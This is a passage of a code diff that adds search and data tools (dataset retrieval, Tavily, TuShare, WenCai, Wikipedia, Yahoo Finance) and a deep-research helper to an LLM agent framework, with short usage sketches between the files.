from agent.tools.base import ToolParamBase, ToolBase, ToolMeta
from api.db import LLMType
from api.db.services.knowledgebase_service import KnowledgebaseService
from api.db.services.llm_service import LLMBundle
from api import settings
from api.utils.api_utils import timeout
from rag.app.tag import label_question
from rag.prompts import kb_prompt
from rag.prompts.prompts import cross_languages


class RetrievalParam(ToolParamBase):
    """
    Define the Retrieval component parameters.
    """

    def __init__(self):
        self.meta: ToolMeta = {
            "name": "search_my_dateset",
            "description": "This tool can be utilized for relevant content searching in the datasets.",
            "parameters": {
                "query": {
                    "type": "string",
                    "description": "The keywords to search the dataset. The keywords should be the most important words/terms (including synonyms) from the original request.",
                    "default": "",
                    "required": True
                }
            }
        }
        super().__init__()
        self.function_name = "search_my_dateset"
        self.description = "This tool can be utilized for relevant content searching in the datasets."
        self.similarity_threshold = 0.2
        self.keywords_similarity_weight = 0.5
        self.top_n = 8
        self.top_k = 1024
        self.kb_ids = []
        self.kb_vars = []
        self.rerank_id = ""
        self.empty_response = ""
        self.use_kg = False
        self.cross_languages = []

    def check(self):
        self.check_decimal_float(self.similarity_threshold, "[Retrieval] Similarity threshold")
        self.check_decimal_float(self.keywords_similarity_weight, "[Retrieval] Keyword similarity weight")
        self.check_positive_number(self.top_n, "[Retrieval] Top N")

    def get_input_form(self) -> dict[str, dict]:
        return {
            "query": {
                "name": "Query",
                "type": "line"
            }
        }


class Retrieval(ToolBase, ABC):
    component_name = "Retrieval"

    @timeout(os.environ.get("COMPONENT_EXEC_TIMEOUT", 12))
    def _invoke(self, **kwargs):
        if not kwargs.get("query"):
            self.set_output("formalized_content", self._param.empty_response)
            return self._param.empty_response

        kb_ids: list[str] = []
        for id in self._param.kb_ids:
            if id.find("@") < 0:
                kb_ids.append(id)
                continue
            kb_nm = self._canvas.get_variable_value(id)
            e, kb = KnowledgebaseService.get_by_name(kb_nm)
            if not e:
                raise Exception(f"Dataset({kb_nm}) does not exist.")
            kb_ids.append(kb.id)

        filtered_kb_ids: list[str] = list(set([kb_id for kb_id in kb_ids if kb_id]))

        kbs = KnowledgebaseService.get_by_ids(filtered_kb_ids)
        if not kbs:
            raise Exception("No dataset is selected.")

        embd_nms = list(set([kb.embd_id for kb in kbs]))
        assert len(embd_nms) == 1, "Knowledge bases use different embedding models."

        embd_mdl = None
        if embd_nms:
            embd_mdl = LLMBundle(self._canvas.get_tenant_id(), LLMType.EMBEDDING, embd_nms[0])

        rerank_mdl = None
        if self._param.rerank_id:
            rerank_mdl = LLMBundle(kbs[0].tenant_id, LLMType.RERANK, self._param.rerank_id)

        query = kwargs["query"]
        if self._param.cross_languages:
            query = cross_languages(kbs[0].tenant_id, None, query, self._param.cross_languages)

        if kbs:
            query = re.sub(r"^user[::\s]*", "", query, flags=re.IGNORECASE)
            kbinfos = settings.retrievaler.retrieval(
                query,
                embd_mdl,
                [kb.tenant_id for kb in kbs],
                filtered_kb_ids,
                1,
                self._param.top_n,
                self._param.similarity_threshold,
                1 - self._param.keywords_similarity_weight,
                aggs=False,
                rerank_mdl=rerank_mdl,
                rank_feature=label_question(query, kbs),
            )
            if self._param.use_kg:
                ck = settings.kg_retrievaler.retrieval(query,
                                                       [kb.tenant_id for kb in kbs],
                                                       kb_ids,
                                                       embd_mdl,
                                                       LLMBundle(self._canvas.get_tenant_id(), LLMType.CHAT))
                if ck["content_with_weight"]:
                    kbinfos["chunks"].insert(0, ck)
        else:
            kbinfos = {"chunks": [], "doc_aggs": []}

        if self._param.use_kg and kbs:
            ck = settings.kg_retrievaler.retrieval(query, [kb.tenant_id for kb in kbs], filtered_kb_ids, embd_mdl, LLMBundle(kbs[0].tenant_id, LLMType.CHAT))
            if ck["content_with_weight"]:
                ck["content"] = ck["content_with_weight"]
                del ck["content_with_weight"]
                kbinfos["chunks"].insert(0, ck)

        for ck in kbinfos["chunks"]:
            if "vector" in ck:
                del ck["vector"]
            if "content_ltks" in ck:
                del ck["content_ltks"]

        if not kbinfos["chunks"]:
            self.set_output("formalized_content", self._param.empty_response)
            return

        self._canvas.add_refernce(kbinfos["chunks"], kbinfos["doc_aggs"])
        form_cnt = "\n".join(kb_prompt(kbinfos, 200000, True))
        self.set_output("formalized_content", form_cnt)
        return form_cnt

    def thoughts(self) -> str:
        return """
Keywords: {}
Looking for the most relevant articles.
""".format(self.get_input().get("query", "-_-!"))
agent/tools/tavily.py (new file, 227 lines)
@@ -0,0 +1,227 @@
#
#  Copyright 2024 The InfiniFlow Authors. All Rights Reserved.
#
#  Licensed under the Apache License, Version 2.0 (the "License");
#  you may not use this file except in compliance with the License.
#  You may obtain a copy of the License at
#
#      http://www.apache.org/licenses/LICENSE-2.0
#
#  Unless required by applicable law or agreed to in writing, software
#  distributed under the License is distributed on an "AS IS" BASIS,
#  WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
#  See the License for the specific language governing permissions and
#  limitations under the License.
#
import logging
import os
import time
from abc import ABC
from tavily import TavilyClient
from agent.tools.base import ToolParamBase, ToolBase, ToolMeta
from api.utils.api_utils import timeout


class TavilySearchParam(ToolParamBase):
    """
    Define the TavilySearch component parameters.
    """

    def __init__(self):
        self.meta: ToolMeta = {
            "name": "tavily_search",
            "description": """
Tavily is a search engine optimized for LLMs, aimed at efficient, quick and persistent search results.
When searching:
- Start with a specific query that focuses on just a single aspect.
- Keep the number of keywords in the query below 5.
- Broaden the search terms if needed.
- Cross-reference information from multiple sources.
""",
            "parameters": {
                "query": {
                    "type": "string",
                    "description": "The search keywords to execute with Tavily. The keywords should be the most important words/terms (including synonyms) from the original request.",
                    "default": "{sys.query}",
                    "required": True
                },
                "topic": {
                    "type": "string",
                    "description": "default: general. The category of the search. `news` is useful for retrieving real-time updates, particularly about politics, sports, and major current events covered by mainstream media sources. `general` is for broader, more general-purpose searches that may include a wide range of sources.",
                    "enum": ["general", "news"],
                    "default": "general",
                    "required": False,
                },
                "include_domains": {
                    "type": "array",
                    "description": "default: []. A list of domains to which the search results are restricted.",
                    "default": [],
                    "items": {
                        "type": "string",
                        "description": "Domain name that must be included, e.g. www.yahoo.com"
                    },
                    "required": False
                },
                "exclude_domains": {
                    "type": "array",
                    "description": "default: []. A list of domains from which search results must not be included.",
                    "default": [],
                    "items": {
                        "type": "string",
                        "description": "Domain name that must be excluded, e.g. www.yahoo.com"
                    },
                    "required": False
                },
            }
        }
        super().__init__()
        self.api_key = ""
        self.topic = "general"  # general/news; referenced by check()
        self.search_depth = "basic"  # basic/advanced
        self.max_results = 6
        self.days = 14
        self.include_answer = False
        self.include_raw_content = False
        self.include_images = False
        self.include_image_descriptions = False

    def check(self):
        self.check_valid_value(self.topic, "Tavily topic: should be in 'general/news'", ["general", "news"])
        self.check_valid_value(self.search_depth, "Tavily search depth should be in 'basic/advanced'", ["basic", "advanced"])
        self.check_positive_integer(self.max_results, "Tavily max result number should be within [1, 20]")
        self.check_positive_integer(self.days, "Tavily days should be greater than 1")

    def get_input_form(self) -> dict[str, dict]:
        return {
            "query": {
                "name": "Query",
                "type": "line"
            }
        }


class TavilySearch(ToolBase, ABC):
    component_name = "TavilySearch"

    @timeout(os.environ.get("COMPONENT_EXEC_TIMEOUT", 12))
    def _invoke(self, **kwargs):
        if not kwargs.get("query"):
            self.set_output("formalized_content", "")
            return ""

        self.tavily_client = TavilyClient(api_key=self._param.api_key)
        last_e = None
        for fld in ["search_depth", "topic", "max_results", "days", "include_answer", "include_raw_content", "include_images", "include_image_descriptions", "include_domains", "exclude_domains"]:
            if fld not in kwargs:
                kwargs[fld] = getattr(self._param, fld)
        for _ in range(self._param.max_retries + 1):
            try:
                kwargs["include_images"] = False
                kwargs["include_raw_content"] = False
                res = self.tavily_client.search(**kwargs)
                self._retrieve_chunks(res["results"],
                                      get_title=lambda r: r["title"],
                                      get_url=lambda r: r["url"],
                                      get_content=lambda r: r["raw_content"] if r["raw_content"] else r["content"],
                                      get_score=lambda r: r["score"])
                self.set_output("json", res["results"])
                return self.output("formalized_content")
            except Exception as e:
                last_e = e
                logging.exception(f"Tavily error: {e}")
                time.sleep(self._param.delay_after_error)
        if last_e:
            self.set_output("_ERROR", str(last_e))
            return f"Tavily error: {last_e}"

        assert False, self.output()

    def thoughts(self) -> str:
        return """
Keywords: {}
Looking for the most relevant articles.
""".format(self.get_input().get("query", "-_-!"))


class TavilyExtractParam(ToolParamBase):
    """
    Define the TavilyExtract component parameters.
    """

    def __init__(self):
        self.meta: ToolMeta = {
            "name": "tavily_extract",
            "description": "Extract web page content from one or more specified URLs using Tavily Extract.",
            "parameters": {
                "urls": {
                    "type": "array",
                    "description": "The URLs to extract content from.",
                    "default": "",
                    "items": {
                        "type": "string",
                        "description": "The URL to extract content from, e.g. www.yahoo.com"
                    },
                    "required": True
                },
                "extract_depth": {
                    "type": "string",
                    "description": "The depth of the extraction process. advanced extraction retrieves more data, including tables and embedded content, with higher success but may increase latency. basic extraction costs 1 credit per 5 successful URL extractions, while advanced extraction costs 2 credits per 5 successful URL extractions.",
                    "enum": ["basic", "advanced"],
                    "default": "basic",
                    "required": False,
                },
                "format": {
                    "type": "string",
                    "description": "The format of the extracted web page content. markdown returns content in markdown format. text returns plain text and may increase latency.",
                    "enum": ["markdown", "text"],
                    "default": "markdown",
                    "required": False,
                }
            }
        }
        super().__init__()
        self.api_key = ""
        self.extract_depth = "basic"  # basic/advanced
        self.urls = []
        self.format = "markdown"
        self.include_images = False

    def check(self):
        self.check_valid_value(self.extract_depth, "Tavily extract depth should be in 'basic/advanced'", ["basic", "advanced"])
        self.check_valid_value(self.format, "Tavily extract format should be in 'markdown/text'", ["markdown", "text"])

    def get_input_form(self) -> dict[str, dict]:
        return {
            "urls": {
                "name": "URLs",
                "type": "line"
            }
        }


class TavilyExtract(ToolBase, ABC):
    component_name = "TavilyExtract"

    @timeout(os.environ.get("COMPONENT_EXEC_TIMEOUT", 10 * 60))
    def _invoke(self, **kwargs):
        self.tavily_client = TavilyClient(api_key=self._param.api_key)
        last_e = None
        for fld in ["urls", "extract_depth", "format"]:
            if fld not in kwargs:
                kwargs[fld] = getattr(self._param, fld)
        if kwargs.get("urls") and isinstance(kwargs["urls"], str):
            kwargs["urls"] = kwargs["urls"].split(",")
        for _ in range(self._param.max_retries + 1):
            try:
                kwargs["include_images"] = False
                res = self.tavily_client.extract(**kwargs)
                self.set_output("json", res["results"])
                return self.output("json")
            except Exception as e:
                last_e = e
                logging.exception(f"Tavily error: {e}")
        if last_e:
            self.set_output("_ERROR", str(last_e))
            return f"Tavily error: {last_e}"

        assert False, self.output()

    def thoughts(self) -> str:
        return "Opened {}—pulling out the main text…".format(self.get_input().get("urls", "-_-!"))
agent/tools/tushare.py (new file, 72 lines)
@@ -0,0 +1,72 @@
#
#  Copyright 2024 The InfiniFlow Authors. All Rights Reserved.
#
#  Licensed under the Apache License, Version 2.0 (the "License");
#  you may not use this file except in compliance with the License.
#  You may obtain a copy of the License at
#
#      http://www.apache.org/licenses/LICENSE-2.0
#
#  Unless required by applicable law or agreed to in writing, software
#  distributed under the License is distributed on an "AS IS" BASIS,
#  WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
#  See the License for the specific language governing permissions and
#  limitations under the License.
#
import json
from abc import ABC
import pandas as pd
import time
import requests
from agent.component.base import ComponentBase, ComponentParamBase


class TuShareParam(ComponentParamBase):
    """
    Define the TuShare component parameters.
    """

    def __init__(self):
        super().__init__()
        self.token = "xxx"
        self.src = "eastmoney"
        self.start_date = "2024-01-01 09:00:00"
        self.end_date = time.strftime("%Y-%m-%d %H:%M:%S", time.localtime())
        self.keyword = ""

    def check(self):
        self.check_valid_value(self.src, "Quick News Source",
                               ["sina", "wallstreetcn", "10jqka", "eastmoney", "yuncaijing", "fenghuang", "jinrongjie"])


class TuShare(ComponentBase, ABC):
    component_name = "TuShare"

    def _run(self, history, **kwargs):
        ans = self.get_input()
        ans = ",".join(ans["content"]) if "content" in ans else ""
        if not ans:
            return TuShare.be_output("")

        try:
            tus_res = []
            params = {
                "api_name": "news",
                "token": self._param.token,
                "params": {"src": self._param.src, "start_date": self._param.start_date,
                           "end_date": self._param.end_date}
            }
            response = requests.post(url="http://api.tushare.pro", data=json.dumps(params).encode('utf-8'))
            response = response.json()
            if response['code'] != 0:
                return TuShare.be_output(response['msg'])
            df = pd.DataFrame(response['data']['items'])
            df.columns = response['data']['fields']
            tus_res.append({"content": (df[df['content'].str.contains(self._param.keyword, case=False)]).to_markdown()})
        except Exception as e:
            return TuShare.be_output("**ERROR**: " + str(e))

        if not tus_res:
            return TuShare.be_output("")

        return pd.DataFrame(tus_res)
|
||||||
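A minimal sketch of the raw TuShare "news" HTTP call the component wraps: POST a JSON body with `api_name`, `token`, and `params` to `http://api.tushare.pro`, then rebuild a DataFrame from the `fields`/`items` pair in the response. The token is a placeholder; the response keys mirror the component code above.

```python
# Standalone sketch of the TuShare news API protocol used by the component.
import json
import requests
import pandas as pd

payload = {
    "api_name": "news",
    "token": "your_tushare_token",  # placeholder
    "params": {"src": "eastmoney",
               "start_date": "2024-01-01 09:00:00",
               "end_date": "2024-01-02 09:00:00"},
}
resp = requests.post("http://api.tushare.pro",
                     data=json.dumps(payload).encode("utf-8")).json()
if resp["code"] == 0:
    # The API returns column names and rows separately.
    df = pd.DataFrame(resp["data"]["items"], columns=resp["data"]["fields"])
    print(df[df["content"].str.contains("AI", case=False)].to_markdown())
else:
    print(resp["msg"])
```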
agent/tools/wencai.py (new file, 114 lines)
@@ -0,0 +1,114 @@
#
# Copyright 2024 The InfiniFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
#     http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import logging
import os
import time
from abc import ABC

import pandas as pd
import pywencai

from agent.tools.base import ToolParamBase, ToolMeta, ToolBase
from api.utils.api_utils import timeout


class WenCaiParam(ToolParamBase):
    """
    Define the WenCai component parameters.
    """

    def __init__(self):
        self.meta: ToolMeta = {
            "name": "iwencai",
            "description": """
iwencai search: a search platform committed to providing hundreds of millions of investors with the most timely, accurate, and comprehensive information, covering news, announcements, research reports, blogs, forums, Weibo, public figures, etc.
robo-advisor intelligent stock selection platform: through AI technology, committed to providing investors with intelligent stock selection, quantitative investment, main-force tracking, value investment, technical analysis, and other stock selection technologies.
fund selection platform: through AI technology, committed to providing fund investors with excellent-fund screening, value investment, quantitative analysis, and other fund selection technologies.
""",
            "parameters": {
                "query": {
                    "type": "string",
                    "description": "The question/conditions to select stocks.",
                    "default": "{sys.query}",
                    "required": True
                }
            }
        }
        super().__init__()
        self.top_n = 10
        self.query_type = "stock"

    def check(self):
        self.check_positive_integer(self.top_n, "Top N")
        self.check_valid_value(self.query_type, "Query type",
                               ['stock', 'zhishu', 'fund', 'hkstock', 'usstock', 'threeboard', 'conbond', 'insurance',
                                'futures', 'lccp',
                                'foreign_exchange'])

    def get_input_form(self) -> dict[str, dict]:
        return {
            "query": {
                "name": "Query",
                "type": "line"
            }
        }


class WenCai(ToolBase, ABC):
    component_name = "WenCai"

    @timeout(os.environ.get("COMPONENT_EXEC_TIMEOUT", 12))
    def _invoke(self, **kwargs):
        if not kwargs.get("query"):
            self.set_output("report", "")
            return ""

        last_e = ""
        for _ in range(self._param.max_retries + 1):
            try:
                wencai_res = []
                res = pywencai.get(query=kwargs["query"], query_type=self._param.query_type, perpage=self._param.top_n)
                if isinstance(res, pd.DataFrame):
                    wencai_res.append(res.to_markdown())
                elif isinstance(res, dict):
                    for key, value in res.items():
                        if isinstance(value, list):
                            wencai_res.append(key + "\n" + pd.DataFrame(value).to_markdown())
                        elif isinstance(value, str):
                            wencai_res.append(key + "\n" + value)
                        elif isinstance(value, dict):
                            if "meta" in value.keys():
                                continue
                            wencai_res.append(pd.DataFrame.from_dict(value, orient='index').to_markdown())
                        elif isinstance(value, pd.DataFrame):
                            if "image_url" in value.columns:
                                continue
                            wencai_res.append(value.to_markdown())
                        else:
                            wencai_res.append(key + "\n" + str(value))
                self.set_output("report", "\n\n".join(wencai_res))
                return self.output("report")
            except Exception as e:
                last_e = e
                logging.exception(f"WenCai error: {e}")
                time.sleep(self._param.delay_after_error)

        if last_e:
            self.set_output("_ERROR", str(last_e))
            return f"WenCai error: {last_e}"

        assert False, self.output()

    def thoughts(self) -> str:
        return "Pulling live financial data for `{}`.".format(self.get_input().get("query", "-_-!"))
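The `_invoke` above normalizes heterogeneous `pywencai.get` results into one markdown report. A standalone sketch of just that flattening logic, runnable without pywencai installed (the sample dict stands in for a real result):

```python
# Standalone sketch of the result-flattening logic above: pywencai.get may
# return a DataFrame or a dict whose values mix DataFrames, lists, dicts,
# and strings, so everything is normalized to markdown text.
import pandas as pd

def flatten_wencai(res) -> str:
    parts = []
    if isinstance(res, pd.DataFrame):
        parts.append(res.to_markdown())
    elif isinstance(res, dict):
        for key, value in res.items():
            if isinstance(value, list):
                parts.append(key + "\n" + pd.DataFrame(value).to_markdown())
            elif isinstance(value, str):
                parts.append(key + "\n" + value)
            elif isinstance(value, dict):
                if "meta" not in value:  # metadata blocks are skipped
                    parts.append(pd.DataFrame.from_dict(value, orient="index").to_markdown())
            elif isinstance(value, pd.DataFrame):
                if "image_url" not in value.columns:  # image tables are skipped
                    parts.append(value.to_markdown())
            else:
                parts.append(key + "\n" + str(value))
    return "\n\n".join(parts)

print(flatten_wencai({"summary": "demo", "rows": [{"code": "600519", "pe": 30}]}))
```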
agent/tools/wikipedia.py (new file, 104 lines)
@@ -0,0 +1,104 @@
#
# Copyright 2024 The InfiniFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
#     http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import logging
import os
import time
from abc import ABC

import wikipedia

from agent.tools.base import ToolMeta, ToolParamBase, ToolBase
from api.utils.api_utils import timeout


class WikipediaParam(ToolParamBase):
    """
    Define the Wikipedia component parameters.
    """

    def __init__(self):
        self.meta: ToolMeta = {
            "name": "wikipedia_search",
            "description": """A wide range of how-to and informational pages are made available on Wikipedia. Since 2001, it has grown rapidly to become the world's largest reference website. From Wikipedia, the free encyclopedia.""",
            "parameters": {
                "query": {
                    "type": "string",
                    "description": "The search keyword to execute with wikipedia. The keyword MUST be a specific subject that can match the title.",
                    "default": "{sys.query}",
                    "required": True
                }
            }
        }
        super().__init__()
        self.top_n = 10
        self.language = "en"

    def check(self):
        self.check_positive_integer(self.top_n, "Top N")
        self.check_valid_value(self.language, "Wikipedia languages",
                               ['af', 'pl', 'ar', 'ast', 'az', 'bg', 'nan', 'bn', 'be', 'ca', 'cs', 'cy', 'da', 'de',
                                'et', 'el', 'en', 'es', 'eo', 'eu', 'fa', 'fr', 'gl', 'ko', 'hy', 'hi', 'hr', 'id',
                                'it', 'he', 'ka', 'lld', 'la', 'lv', 'lt', 'hu', 'mk', 'arz', 'ms', 'min', 'my', 'nl',
                                'ja', 'nb', 'nn', 'ce', 'uz', 'pt', 'kk', 'ro', 'ru', 'ceb', 'sk', 'sl', 'sr', 'sh',
                                'fi', 'sv', 'ta', 'tt', 'th', 'tg', 'azb', 'tr', 'uk', 'ur', 'vi', 'war', 'zh', 'yue'])

    def get_input_form(self) -> dict[str, dict]:
        return {
            "query": {
                "name": "Query",
                "type": "line"
            }
        }


class Wikipedia(ToolBase, ABC):
    component_name = "Wikipedia"

    @timeout(os.environ.get("COMPONENT_EXEC_TIMEOUT", 60))
    def _invoke(self, **kwargs):
        if not kwargs.get("query"):
            self.set_output("formalized_content", "")
            return ""

        last_e = ""
        for _ in range(self._param.max_retries + 1):
            try:
                wikipedia.set_lang(self._param.language)
                wiki_engine = wikipedia
                pages = []
                for p in wiki_engine.search(kwargs["query"], results=self._param.top_n):
                    try:
                        pages.append(wikipedia.page(p))
                    except Exception:
                        pass
                self._retrieve_chunks(pages,
                                      get_title=lambda r: r.title,
                                      get_url=lambda r: r.url,
                                      get_content=lambda r: r.summary)
                return self.output("formalized_content")
            except Exception as e:
                last_e = e
                logging.exception(f"Wikipedia error: {e}")
                time.sleep(self._param.delay_after_error)

        if last_e:
            self.set_output("_ERROR", str(last_e))
            return f"Wikipedia error: {last_e}"

        assert False, self.output()

    def thoughts(self) -> str:
        return """
Keywords: {}
Looking for the most relevant articles.
""".format(self.get_input().get("query", "-_-!"))
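A minimal sketch of the search-then-page pattern used above, assuming the `wikipedia` PyPI package; failed page loads (disambiguation pages, missing articles) are skipped just as in the component:

```python
# Standalone sketch of the wikipedia-library calls the component makes.
import wikipedia

wikipedia.set_lang("en")
pages = []
for title in wikipedia.search("Steven Spielberg", results=3):
    try:
        pages.append(wikipedia.page(title))
    except Exception:
        pass  # e.g. DisambiguationError or PageError

for p in pages:
    print(p.title, p.url)
    print(p.summary[:200], "...")
```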
agent/tools/yahoofinance.py (new file, 114 lines)
@@ -0,0 +1,114 @@
#
# Copyright 2024 The InfiniFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
#     http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import logging
import os
import time
from abc import ABC

import pandas as pd
import yfinance as yf

from agent.tools.base import ToolMeta, ToolParamBase, ToolBase
from api.utils.api_utils import timeout


class YahooFinanceParam(ToolParamBase):
    """
    Define the YahooFinance component parameters.
    """

    def __init__(self):
        self.meta: ToolMeta = {
            "name": "yahoo_finance",
            "description": "Yahoo Finance is a service that provides access to real-time and historical stock market data. It enables users to fetch various types of stock information, such as price quotes, historical prices, company profiles, and financial news. The API offers structured data, allowing developers to integrate market data into their applications and analysis tools.",
            "parameters": {
                "stock_code": {
                    "type": "string",
                    "description": "The stock code or company name.",
                    "default": "{sys.query}",
                    "required": True
                }
            }
        }
        super().__init__()
        self.info = True
        self.history = False
        self.count = False
        self.financials = False
        self.income_stmt = False
        self.balance_sheet = False
        self.cash_flow_statement = False
        self.news = True

    def check(self):
        self.check_boolean(self.info, "get all stock info")
        self.check_boolean(self.history, "get historical market data")
        self.check_boolean(self.count, "show share count")
        self.check_boolean(self.financials, "show financials")
        self.check_boolean(self.income_stmt, "income statement")
        self.check_boolean(self.balance_sheet, "balance sheet")
        self.check_boolean(self.cash_flow_statement, "cash flow statement")
        self.check_boolean(self.news, "show news")

    def get_input_form(self) -> dict[str, dict]:
        return {
            "stock_code": {
                "name": "Stock code/Company name",
                "type": "line"
            }
        }


class YahooFinance(ToolBase, ABC):
    component_name = "YahooFinance"

    @timeout(os.environ.get("COMPONENT_EXEC_TIMEOUT", 60))
    def _invoke(self, **kwargs):
        if not kwargs.get("stock_code"):
            self.set_output("report", "")
            return ""

        last_e = ""
        for _ in range(self._param.max_retries + 1):
            yahoo_res = []
            try:
                msft = yf.Ticker(kwargs["stock_code"])
                if self._param.info:
                    yahoo_res.append("# Information:\n" + pd.Series(msft.info).to_markdown() + "\n")
                if self._param.history:
                    yahoo_res.append("# History:\n" + msft.history().to_markdown() + "\n")
                if self._param.financials:
                    yahoo_res.append("# Calendar:\n" + pd.DataFrame(msft.calendar).to_markdown() + "\n")
                if self._param.income_stmt:
                    # annual income statement (flag was declared but previously unused)
                    yahoo_res.append("# Income statement:\n" + msft.income_stmt.to_markdown() + "\n")
                if self._param.balance_sheet:
                    yahoo_res.append("# Balance sheet:\n" + msft.balance_sheet.to_markdown() + "\n")
                    yahoo_res.append("# Quarterly balance sheet:\n" + msft.quarterly_balance_sheet.to_markdown() + "\n")
                if self._param.cash_flow_statement:
                    yahoo_res.append("# Cash flow statement:\n" + msft.cashflow.to_markdown() + "\n")
                    yahoo_res.append("# Quarterly cash flow statement:\n" + msft.quarterly_cashflow.to_markdown() + "\n")
                if self._param.news:
                    yahoo_res.append("# News:\n" + pd.DataFrame(msft.news).to_markdown() + "\n")
                self.set_output("report", "\n\n".join(yahoo_res))
                return self.output("report")
            except Exception as e:
                last_e = e
                logging.exception(f"YahooFinance error: {e}")
                time.sleep(self._param.delay_after_error)

        if last_e:
            self.set_output("_ERROR", str(last_e))
            return f"YahooFinance error: {last_e}"

        assert False, self.output()

    def thoughts(self) -> str:
        return "Pulling live financial data for `{}`.".format(self.get_input().get("stock_code", "-_-!"))
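A minimal sketch of the yfinance calls assembled above into a markdown report; "MSFT" is an arbitrary example ticker:

```python
# Standalone sketch of the yfinance calls the component stitches together.
import pandas as pd
import yfinance as yf

ticker = yf.Ticker("MSFT")
report = []
report.append("# Information:\n" + pd.Series(ticker.info).to_markdown())
report.append("# History:\n" + ticker.history().to_markdown())  # default period is about one month
report.append("# News:\n" + pd.DataFrame(ticker.news).to_markdown())
print("\n\n".join(report))
```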
agentic_reasoning/__init__.py (new file, 1 line)
@@ -0,0 +1 @@
from .deep_research import DeepResearcher as DeepResearcher
agentic_reasoning/deep_research.py (new file, 236 lines)
@@ -0,0 +1,236 @@
#
# Copyright 2024 The InfiniFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
#     http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import logging
import re
from functools import partial

from agentic_reasoning.prompts import BEGIN_SEARCH_QUERY, BEGIN_SEARCH_RESULT, END_SEARCH_RESULT, MAX_SEARCH_LIMIT, \
    END_SEARCH_QUERY, REASON_PROMPT, RELEVANT_EXTRACTION_PROMPT
from api.db.services.llm_service import LLMBundle
from rag.nlp import extract_between
from rag.prompts import kb_prompt
from rag.utils.tavily_conn import Tavily


class DeepResearcher:
    def __init__(self,
                 chat_mdl: LLMBundle,
                 prompt_config: dict,
                 kb_retrieve: partial = None,
                 kg_retrieve: partial = None
                 ):
        self.chat_mdl = chat_mdl
        self.prompt_config = prompt_config
        self._kb_retrieve = kb_retrieve
        self._kg_retrieve = kg_retrieve

    @staticmethod
    def _remove_tags(text: str, start_tag: str, end_tag: str) -> str:
        """General tag removal method"""
        pattern = re.escape(start_tag) + r"(.*?)" + re.escape(end_tag)
        return re.sub(pattern, "", text)

    @staticmethod
    def _remove_query_tags(text: str) -> str:
        """Remove query tags"""
        return DeepResearcher._remove_tags(text, BEGIN_SEARCH_QUERY, END_SEARCH_QUERY)

    @staticmethod
    def _remove_result_tags(text: str) -> str:
        """Remove result tags"""
        return DeepResearcher._remove_tags(text, BEGIN_SEARCH_RESULT, END_SEARCH_RESULT)

    def _generate_reasoning(self, msg_history):
        """Generate reasoning steps"""
        query_think = ""
        if msg_history[-1]["role"] != "user":
            msg_history.append({"role": "user", "content": "Continues reasoning with the new information.\n"})
        else:
            msg_history[-1]["content"] += "\n\nContinues reasoning with the new information.\n"

        for ans in self.chat_mdl.chat_streamly(REASON_PROMPT, msg_history, {"temperature": 0.7}):
            ans = re.sub(r"^.*</think>", "", ans, flags=re.DOTALL)
            if not ans:
                continue
            query_think = ans
            yield query_think
        return query_think

    def _extract_search_queries(self, query_think, question, step_index):
        """Extract search queries from the thinking text"""
        queries = extract_between(query_think, BEGIN_SEARCH_QUERY, END_SEARCH_QUERY)
        if not queries and step_index == 0:
            # If this is the first step and no queries are found, use the original question as the query
            queries = [question]
        return queries

    def _truncate_previous_reasoning(self, all_reasoning_steps):
        """Truncate previous reasoning steps to maintain a reasonable length"""
        truncated_prev_reasoning = ""
        for i, step in enumerate(all_reasoning_steps):
            truncated_prev_reasoning += f"Step {i + 1}: {step}\n\n"

        prev_steps = truncated_prev_reasoning.split('\n\n')
        if len(prev_steps) <= 5:
            truncated_prev_reasoning = '\n\n'.join(prev_steps)
        else:
            truncated_prev_reasoning = ''
            for i, step in enumerate(prev_steps):
                if i == 0 or i >= len(prev_steps) - 4 or BEGIN_SEARCH_QUERY in step or BEGIN_SEARCH_RESULT in step:
                    truncated_prev_reasoning += step + '\n\n'
                else:
                    if truncated_prev_reasoning[-len('\n\n...\n\n'):] != '\n\n...\n\n':
                        truncated_prev_reasoning += '...\n\n'

        return truncated_prev_reasoning.strip('\n')

    def _retrieve_information(self, search_query):
        """Retrieve information from different sources"""
        # 1. Knowledge base retrieval (initialized as an empty result so a
        #    retrieval failure still leaves a usable dict)
        kbinfos = {"chunks": [], "doc_aggs": []}
        try:
            kbinfos = self._kb_retrieve(question=search_query) if self._kb_retrieve else {"chunks": [], "doc_aggs": []}
        except Exception as e:
            logging.error(f"Knowledge base retrieval error: {e}")

        # 2. Web retrieval (if the Tavily API is configured)
        try:
            if self.prompt_config.get("tavily_api_key"):
                tav = Tavily(self.prompt_config["tavily_api_key"])
                tav_res = tav.retrieve_chunks(search_query)
                kbinfos["chunks"].extend(tav_res["chunks"])
                kbinfos["doc_aggs"].extend(tav_res["doc_aggs"])
        except Exception as e:
            logging.error(f"Web retrieval error: {e}")

        # 3. Knowledge graph retrieval (if configured)
        try:
            if self.prompt_config.get("use_kg") and self._kg_retrieve:
